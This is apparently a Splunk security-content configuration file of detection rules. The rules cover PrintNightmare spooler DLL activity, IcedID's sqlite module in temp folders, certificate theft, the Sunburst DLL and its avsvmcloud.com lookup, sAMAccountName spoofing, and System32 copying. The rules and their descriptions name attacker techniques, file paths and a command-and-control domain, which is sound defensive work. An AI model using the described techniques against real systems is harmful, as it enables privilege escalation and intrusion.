action.correlationsearch.annotations = {"analytic_story": ["PrintNightmare CVE-2021-34527"], "cis20": ["CIS 10"], "confidence": 90, "cve": ["CVE-2021-34527"], "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.012", "T1547"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search detects suspicious loading of DLLs from a specific path related to PrintNightmare exploitation. It looks for the modules loaded by spoolsv.exe after the exploitation.
action.notable.param.rule_title = Spoolsv Suspicious Loaded Modules
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `sysmon` EventCode=7 Image ="*\\spoolsv.exe" ImageLoaded="*\\Windows\\System32\\spool\\drivers\\x64\\*" ImageLoaded = "*.dll" | stats dc(ImageLoaded) as countImgloaded values(ImageLoaded) as ImgLoaded count min(_time) as firstTime max(_time) as lastTime by Image Computer ProcessId EventCode | rename Computer as dest | where countImgloaded >= 3 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `spoolsv_suspicious_loaded_modules_filter`

[ESCU - Spoolsv Suspicious Process Access - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic identifies suspicious behavior related to PrintNightmare, or CVE-2021-34527 (previously CVE-2021-1675), used to gain privilege escalation on the vulnerable machine. This exploit attacks a critical Windows Print Spooler vulnerability to elevate privileges. This detection looks for suspicious process access by spoolsv.exe that may be related to the attack.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1068"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This analytic identifies suspicious behavior related to PrintNightmare, or CVE-2021-34527 (previously CVE-2021-1675), used to gain privilege escalation on the vulnerable machine. This exploit attacks a critical Windows Print Spooler vulnerability to elevate privileges. This detection looks for suspicious process access by spoolsv.exe that may be related to the attack.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting process access events that include SourceImage, TargetImage, GrantedAccess and CallTrace from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. Tune and filter known instances of spoolsv.exe.
action.escu.known_false_positives = Unknown. Filter as needed.
action.escu.creation_date = 2021-07-01
action.escu.modification_date = 2021-07-01
action.escu.confidence = high
action.escu.full_search_name = ESCU - Spoolsv Suspicious Process Access - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Sysmon"]
action.escu.analytic_story = ["PrintNightmare CVE-2021-34527"]
action.risk = 1
action.risk.param._risk_message = $SourceImage$ was GrantedAccess open access to $TargetImage$ on endpoint $dest$. This behavior is suspicious and related to PrintNightmare.
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}, {"risk_object_field": "ProcessID", "risk_object_type": "other", "risk_score": 72}, {"risk_object_field": "TargetImage", "risk_object_type": "other", "risk_score": 72}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Spoolsv Suspicious Process Access - Rule
action.correlationsearch.annotations = {"analytic_story": ["PrintNightmare CVE-2021-34527"], "cis20": ["CIS 10"], "confidence": 90, "cve": ["CVE-2021-34527"], "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1068"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic identifies suspicious behavior related to PrintNightmare, or CVE-2021-34527 (previously CVE-2021-1675), used to gain privilege escalation on the vulnerable machine. This exploit attacks a critical Windows Print Spooler vulnerability to elevate privileges. This detection looks for suspicious process access by spoolsv.exe that may be related to the attack.
action.notable.param.rule_title = Spoolsv Suspicious Process Access
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `sysmon` EventCode=10 SourceImage = "*\\spoolsv.exe" CallTrace = "*\\Windows\\system32\\spool\\DRIVERS\\x64\\*" TargetImage IN ("*\\rundll32.exe", "*\\spoolsv.exe") GrantedAccess = 0x1fffff | stats count min(_time) as firstTime max(_time) as lastTime by dest SourceImage TargetImage GrantedAccess CallTrace EventCode ProcessID | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `spoolsv_suspicious_process_access_filter`

[ESCU - Spoolsv Writing a DLL - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies a `.dll` being written by `spoolsv.exe`. This was identified during our testing of CVE-2021-34527 (previously CVE-2021-1675), or PrintNightmare. Typically, it is not normal behavior for `spoolsv.exe` to write a `.dll`. The current POC code writes the suspicious DLL to disk within a path of `\spool\drivers\x64\`. During triage, isolate the endpoint and review for the source of exploitation. Capture any additional file modification events.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.012", "T1547"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies a `.dll` being written by `spoolsv.exe`. This was identified during our testing of CVE-2021-34527 (previously CVE-2021-1675), or PrintNightmare. Typically, it is not normal behavior for `spoolsv.exe` to write a `.dll`. The current POC code writes the suspicious DLL to disk within a path of `\spool\drivers\x64\`.
During triage, isolate the endpoint and review for the source of exploitation. Capture any additional file modification events.
action.escu.how_to_implement = To successfully implement this search you need to be ingesting process information that includes the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Processes` node and `Filesystem` node.
action.escu.known_false_positives = Unknown.
action.escu.creation_date = 2023-11-07
action.escu.modification_date = 2023-11-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - Spoolsv Writing a DLL - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["PrintNightmare CVE-2021-34527"]
action.risk = 1
action.risk.param._risk_message = $process_name$ has been identified writing DLLs to $file_path$ on endpoint $dest$. This behavior is suspicious and related to PrintNightmare.
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}, {"threat_object_field": "process_name", "threat_object_type": "process"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Spoolsv Writing a DLL - Rule
action.correlationsearch.annotations = {"analytic_story": ["PrintNightmare CVE-2021-34527"], "cis20": ["CIS 10"], "confidence": 90, "cve": ["CVE-2021-34527"], "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.012", "T1547"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies a `.dll` being written by `spoolsv.exe`. This was identified during our testing of CVE-2021-34527 (previously CVE-2021-1675), or PrintNightmare. Typically, it is not normal behavior for `spoolsv.exe` to write a `.dll`. The current POC code writes the suspicious DLL to disk within a path of `\spool\drivers\x64\`. During triage, isolate the endpoint and review for the source of exploitation. Capture any additional file modification events.
action.notable.param.rule_title = Spoolsv Writing a DLL
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name=spoolsv.exe by _time Processes.process_guid Processes.process_name Processes.dest | `drop_dm_object_name(Processes)` | join process_guid, _time [| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_path="*\\spool\\drivers\\x64\\*" Filesystem.file_name="*.dll" by _time Filesystem.dest Filesystem.process_guid Filesystem.file_create_time Filesystem.file_name Filesystem.file_path | `drop_dm_object_name(Filesystem)` | fields _time dest file_create_time file_name file_path process_name process_path process_guid process] | dedup file_create_time | table dest file_create_time, file_name, file_path, process_name process_guid | `spoolsv_writing_a_dll_filter`

[ESCU - Spoolsv Writing a DLL - Sysmon - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies a `.dll` being written by `spoolsv.exe`. This was identified during our testing of CVE-2021-34527 (previously CVE-2021-1675), or PrintNightmare. Typically, it is not normal behavior for `spoolsv.exe` to write a `.dll`. The current POC code writes the suspicious DLL to disk within a path of `\spool\drivers\x64\`. During triage, isolate the endpoint and review for the source of exploitation. Capture any additional file modification events.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.012", "T1547"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies a `.dll` being written by `spoolsv.exe`. This was identified during our testing of CVE-2021-34527 (previously CVE-2021-1675), or PrintNightmare. Typically, it is not normal behavior for `spoolsv.exe` to write a `.dll`. The current POC code writes the suspicious DLL to disk within a path of `\spool\drivers\x64\`. During triage, isolate the endpoint and review for the source of exploitation. Capture any additional file modification events.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. Tune and filter known instances where renamed rundll32.exe may be used.
action.escu.known_false_positives = Limited false positives. Filter as needed.
action.escu.creation_date = 2021-07-01
action.escu.modification_date = 2021-07-01
action.escu.confidence = high
action.escu.full_search_name = ESCU - Spoolsv Writing a DLL - Sysmon - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Sysmon"]
action.escu.analytic_story = ["PrintNightmare CVE-2021-34527"]
action.risk = 1
action.risk.param._risk_message = $process_name$ has been identified writing DLLs to $file_path$ on endpoint $dest$. This behavior is suspicious and related to PrintNightmare.
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}, {"threat_object_field": "process_name", "threat_object_type": "process"}, {"threat_object_field": "file_name", "threat_object_type": "file_name"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Spoolsv Writing a DLL - Sysmon - Rule
action.correlationsearch.annotations = {"analytic_story": ["PrintNightmare CVE-2021-34527"], "cis20": ["CIS 10"], "confidence": 90, "cve": ["CVE-2021-34527"], "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.012", "T1547"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies a `.dll` being written by `spoolsv.exe`. This was identified during our testing of CVE-2021-34527 (previously CVE-2021-1675), or PrintNightmare. Typically, it is not normal behavior for `spoolsv.exe` to write a `.dll`. The current POC code writes the suspicious DLL to disk within a path of `\spool\drivers\x64\`. During triage, isolate the endpoint and review for the source of exploitation. Capture any additional file modification events.
action.notable.param.rule_title = Spoolsv Writing a DLL - Sysmon
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `sysmon` EventID=11 process_name=spoolsv.exe file_path="*\\spool\\drivers\\x64\\*" file_name=*.dll | stats count min(_time) as firstTime max(_time) as lastTime by dest, UserID, process_name, file_path, file_name, TargetFilename, process_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `spoolsv_writing_a_dll___sysmon_filter`

[ESCU - Sqlite Module In Temp Folder - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search detects the suspicious creation of sqlite3.dll in the %temp% folder. This behavior was seen in IcedID malware, which downloads a sqlite module to parse browser databases (for example Chrome or Firefox) in order to steal browser information related to banking, credit cards or credentials.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1005"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This search detects the suspicious creation of sqlite3.dll in the %temp% folder. This behavior was seen in IcedID malware, which downloads a sqlite module to parse browser databases (for example Chrome or Firefox) in order to steal browser information related to banking, credit cards or credentials.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2021-08-03
action.escu.modification_date = 2021-08-03
action.escu.confidence = high
action.escu.full_search_name = ESCU - Sqlite Module In Temp Folder - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Sysmon"]
action.escu.analytic_story = ["IcedID"]
action.risk = 1
action.risk.param._risk_message = Process $process_name$ created a file $file_name$ in host $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 9}, {"threat_object_field": "process_name", "threat_object_type": "process"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Sqlite Module In Temp Folder - Rule
action.correlationsearch.annotations = {"analytic_story": ["IcedID"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1005"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search detects the suspicious creation of sqlite3.dll in the %temp% folder. This behavior was seen in IcedID malware, which downloads a sqlite module to parse browser databases (for example Chrome or Firefox) in order to steal browser information related to banking, credit cards or credentials.
action.notable.param.rule_title = Sqlite Module In Temp Folder
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `sysmon` EventCode=11 (TargetFilename = "*\\sqlite32.dll" OR TargetFilename = "*\\sqlite64.dll") (TargetFilename = "*\\temp\\*") | stats count min(_time) as firstTime max(_time) as lastTime by dest signature signature_id process_name file_name file_path action process_guid | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `sqlite_module_in_temp_folder_filter`

[ESCU - Steal or Forge Authentication Certificates Behavior Identified - Rule]
action.escu = 0
action.escu.enabled = 1
description = This correlation rule focuses on detecting potential threats associated with MITRE ATT&CK T1649 (Steal or Forge Authentication Certificates). The rule is designed to identify instances where 5 or more analytics from the Windows Certificate Services analytic story are triggered within a specified time frame, which may indicate a potential attack in progress. By aggregating these analytics, security teams can swiftly respond to and investigate any suspicious activities, enhancing their ability to protect critical assets and prevent unauthorized access to sensitive information.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1649"], "nist": ["DE.AE"]}
action.escu.data_models = ["Risk"]
action.escu.eli5 = This correlation rule focuses on detecting potential threats associated with MITRE ATT&CK T1649 (Steal or Forge Authentication Certificates). The rule is designed to identify instances where 5 or more analytics from the Windows Certificate Services analytic story are triggered within a specified time frame, which may indicate a potential attack in progress.
By aggregating these analytics, security teams can swiftly respond to and investigate any suspicious activities, enhancing their ability to protect critical assets and prevent unauthorized access to sensitive information.
action.escu.how_to_implement = The Windows Certificate Services analytic story must have 5 or more analytics enabled. In addition, ensure the required data is being logged. Modify the correlation as needed based on the volume of noise generated by the other analytics.
action.escu.known_false_positives = False positives may be present based on automated tooling or system administrators. Filter as needed.
action.escu.creation_date = 2023-05-01
action.escu.modification_date = 2023-05-01
action.escu.confidence = high
action.escu.full_search_name = ESCU - Steal or Forge Authentication Certificates Behavior Identified - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Windows Certificate Services"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - RIR - Steal or Forge Authentication Certificates Behavior Identified - Rule
action.correlationsearch.annotations = {"analytic_story": ["Windows Certificate Services"], "cis20": ["CIS 10"], "confidence": 90, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1649"], "nist": ["DE.AE"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This correlation rule focuses on detecting potential threats associated with MITRE ATT&CK T1649 (Steal or Forge Authentication Certificates). The rule is designed to identify instances where 5 or more analytics from the Windows Certificate Services analytic story are triggered within a specified time frame, which may indicate a potential attack in progress. By aggregating these analytics, security teams can swiftly respond to and investigate any suspicious activities, enhancing their ability to protect critical assets and prevent unauthorized access to sensitive information.
action.notable.param.rule_title = RBA: Steal or Forge Authentication Certificates Behavior Identified
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime sum(All_Risk.calculated_risk_score) as risk_score, count(All_Risk.calculated_risk_score) as risk_event_count, values(All_Risk.annotations.mitre_attack.mitre_tactic_id) as annotations.mitre_attack.mitre_tactic_id, dc(All_Risk.annotations.mitre_attack.mitre_tactic_id) as mitre_tactic_id_count, values(All_Risk.annotations.mitre_attack.mitre_technique_id) as annotations.mitre_attack.mitre_technique_id, dc(All_Risk.annotations.mitre_attack.mitre_technique_id) as mitre_technique_id_count, values(All_Risk.tag) as tag, values(source) as source, dc(source) as source_count from datamodel=Risk.All_Risk where All_Risk.analyticstories="Windows Certificate Services" All_Risk.risk_object_type="system" by All_Risk.risk_object All_Risk.risk_object_type All_Risk.annotations.mitre_attack.mitre_tactic | `drop_dm_object_name(All_Risk)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | where source_count >= 5 | `steal_or_forge_authentication_certificates_behavior_identified_filter`

[ESCU - Sunburst Correlation DLL and Network Event - Rule]
action.escu = 0
action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The malware sunburst will load the malicious dll by SolarWinds.BusinessLayerHost.exe. After a period of 12-14 days, the malware will attempt to resolve a subdomain of avsvmcloud.com. This detections will correlate both events. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1203"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The malware sunburst will load the malicious dll by SolarWinds.BusinessLayerHost.exe. After a period of 12-14 days, the malware will attempt to resolve a subdomain of avsvmcloud.com. This detections will correlate both events. action.escu.how_to_implement = This detection relies on sysmon logs with the Event ID 7, Driver loaded. Please tune your sysmon config that you DriverLoad event for SolarWinds.Orion.Core.BusinessLayer.dll is captured by Sysmon. Additionally, you need sysmon logs for Event ID 22, DNS Query. We suggest to run this detection at least once a day over the last 14 days. 
action.escu.known_false_positives = unknown action.escu.creation_date = 2020-12-14 action.escu.modification_date = 2020-12-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Sunburst Correlation DLL and Network Event - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["NOBELIUM Group"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Sunburst Correlation DLL and Network Event - Rule action.correlationsearch.annotations = {"analytic_story": ["NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1203"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The malware sunburst will load the malicious dll by SolarWinds.BusinessLayerHost.exe. After a period of 12-14 days, the malware will attempt to resolve a subdomain of avsvmcloud.com. This detections will correlate both events. 
action.notable.param.rule_title = Sunburst Correlation DLL and Network Event action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = (`sysmon` EventCode=7 ImageLoaded=*SolarWinds.Orion.Core.BusinessLayer.dll) OR (`sysmon` EventCode=22 QueryName=*avsvmcloud.com) | eventstats dc(EventCode) AS dc_events | where dc_events=2 | stats min(_time) as firstTime max(_time) as lastTime values(ImageLoaded) AS ImageLoaded values(QueryName) AS QueryName by host | rename host as dest | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `sunburst_correlation_dll_and_network_event_filter` [ESCU - Suspicious Computer Account Name Change - Rule] action.escu = 0 action.escu.enabled = 1 description = As part of the sAMAccountName Spoofing (CVE-2021-42278) and Domain Controller Impersonation (CVE-2021-42287) exploitation chain, adversaries need to create a new computer account name and rename it to match the name of a domain controller account without the ending '$'. In Windows Active Directory environments, computer account names always end with `$`. This analytic leverages Event Id 4781, `The name of an account was changed`, to identify a computer account rename event with a suspicious name that does not terminate with `$`. This behavior could represent an exploitation attempt of CVE-2021-42278 and CVE-2021-42287 for privilege escalation. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.002"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = As part of the sAMAccountName Spoofing (CVE-2021-42278) and Domain Controller Impersonation (CVE-2021-42287) exploitation chain, adversaries need to create a new computer account name and rename it to match the name of a domain controller account without the ending '$'. In Windows Active Directory environments, computer account names always end with `$`. This analytic leverages Event Id 4781, `The name of an account was changed`, to identify a computer account rename event with a suspicious name that does not terminate with `$`. This behavior could represent an exploitation attempt of CVE-2021-42278 and CVE-2021-42287 for privilege escalation. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Windows event logs from your hosts. In addition, the Splunk Windows TA is needed. action.escu.known_false_positives = Renaming a computer account name to a name that not end with '$' is highly unsual and may not have any legitimate scenarios. 
action.escu.creation_date = 2021-12-20 action.escu.modification_date = 2021-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Computer Account Name Change - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["sAMAccountName Spoofing and Domain Controller Impersonation", "Active Directory Privilege Escalation"] action.risk = 1 action.risk.param._risk_message = A computer account $Old_Account_Name$ was renamed with a suspicious computer name action.risk.param._risk = [{"risk_object_field": "ComputerName", "risk_object_type": "system", "risk_score": 70}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious Computer Account Name Change - Rule action.correlationsearch.annotations = {"analytic_story": ["sAMAccountName Spoofing and Domain Controller Impersonation", "Active Directory Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 70, "cve": ["CVE-2021-42287", "CVE-2021-42278"], "impact": 100, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = As part of the sAMAccountName Spoofing (CVE-2021-42278) and Domain Controller Impersonation (CVE-2021-42287) exploitation chain, adversaries need to create a new computer account name and rename it to match the name of a domain controller account without the ending '$'. In Windows Active Directory environments, computer account names always end with `$`. 
This analytic leverages Event Id 4781, `The name of an account was changed`, to identify a computer account rename event with a suspicious name that does not terminate with `$`. This behavior could represent an exploitation attempt of CVE-2021-42278 and CVE-2021-42287 for privilege escalation. action.notable.param.rule_title = Suspicious Computer Account Name Change action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4781 Old_Account_Name="*$" New_Account_Name!="*$" | table _time, ComputerName, Account_Name, Old_Account_Name, New_Account_Name | `suspicious_computer_account_name_change_filter` [ESCU - Suspicious Copy on System32 - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a suspicious copy of file from systemroot folder of the windows OS. This technique is commonly used by APT or other malware as part of execution (LOLBIN) to run its malicious code using the available legitimate tool in OS. this type of event may seen or may execute of normal user in some instance but this is really a anomaly that needs to be check within the network. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036.003", "T1036"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect a suspicious copy of file from systemroot folder of the windows OS. This technique is commonly used by APT or other malware as part of execution (LOLBIN) to run its malicious code using the available legitimate tool in OS. this type of event may seen or may execute of normal user in some instance but this is really a anomaly that needs to be check within the network. 
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = every user may do this event but very un-ussual. action.escu.creation_date = 2023-08-17 action.escu.modification_date = 2023-08-17 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Copy on System32 - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Unusual Processes", "Qakbot", "IcedID", "AsyncRAT", "Sandworm Tools", "Volt Typhoon"] action.risk = 1 action.risk.param._risk_message = Execution of copy exe to copy file from $process$ in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious Copy on System32 - Rule action.correlationsearch.annotations = 
{"analytic_story": ["Unusual Processes", "Qakbot", "IcedID", "AsyncRAT", "Sandworm Tools", "Volt Typhoon"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036.003", "T1036"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic is to detect a suspicious copy of file from systemroot folder of the windows OS. This technique is commonly used by APT or other malware as part of execution (LOLBIN) to run its malicious code using the available legitimate tool in OS. this type of event may seen or may execute of normal user in some instance but this is really a anomaly that needs to be check within the network. action.notable.param.rule_title = Suspicious Copy on System32 action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name IN("cmd.exe", "powershell*","pwsh.exe", "sqlps.exe", "sqltoolsps.exe", "powershell_ise.exe") AND `process_copy` AND Processes.process IN("*\\Windows\\System32\\*", "*\\Windows\\SysWow64\\*") AND Processes.process = "*copy*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id temp | `drop_dm_object_name(Processes)` | eval splitted_commandline=split(process," ") | eval first_cmdline=lower(mvindex(splitted_commandline,0)) | where NOT LIKE(first_cmdline,"%\\windows\\system32\\%") AND NOT LIKE(first_cmdline,"%\\windows\\syswow64\\%") | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` 
